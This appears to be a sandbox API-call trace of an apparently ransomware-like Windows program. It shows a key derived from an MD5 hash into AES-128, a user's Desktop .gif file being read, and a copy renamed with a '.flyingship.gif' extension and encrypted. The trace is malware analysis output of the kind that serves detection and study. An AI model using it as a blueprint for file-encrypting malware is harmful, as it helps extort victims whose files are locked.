HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0076.895] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.895] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.895] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.896] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.896] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.896] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0076.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.896] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.896] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.896] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0076.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.896] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696ad0) returned 1 [0076.897] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.897] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.897] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.897] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.897] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.897] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.897] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.898] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.898] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.898] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.898] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.898] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.898] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.898] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.898] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.898] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.898] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.898] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.898] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.898] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.898] CryptCreateHash (in: hProv=0x696ad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0076.898] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.899] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.899] CryptHashData (hHash=0x6b89f8, pbData=0x6f96e8, dwDataLen=0x16, dwFlags=0x1) returned 1 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.899] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.899] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.899] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.899] CryptDeriveKey (in: hProv=0x696ad0, Algid=0x660e, hBaseData=0x6b89f8, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8b78) returned 1 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.899] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.899] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0076.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.900] CryptDestroyHash (hHash=0x6b89f8) returned 1 [0076.900] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.974] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.974] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.974] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.974] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dbnuaeypilbfpd.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.974] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.974] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0076.975] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.975] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.975] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.976] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dbnuaeypilbfpd.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0076.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0076.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.977] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0076.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.977] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.977] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8af8 [0076.977] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0076.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0076.978] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0076.978] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.978] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0076.978] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0xfb13, lpOverlapped=0x0) returned 1 [0076.980] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0076.983] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xfb13) returned 0x795ff8 [0076.983] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.983] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.983] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.983] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.984] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0076.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.984] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0076.984] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0076.984] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0076.984] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.984] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.984] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0076.984] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0076.984] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.985] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.985] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0076.985] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.985] 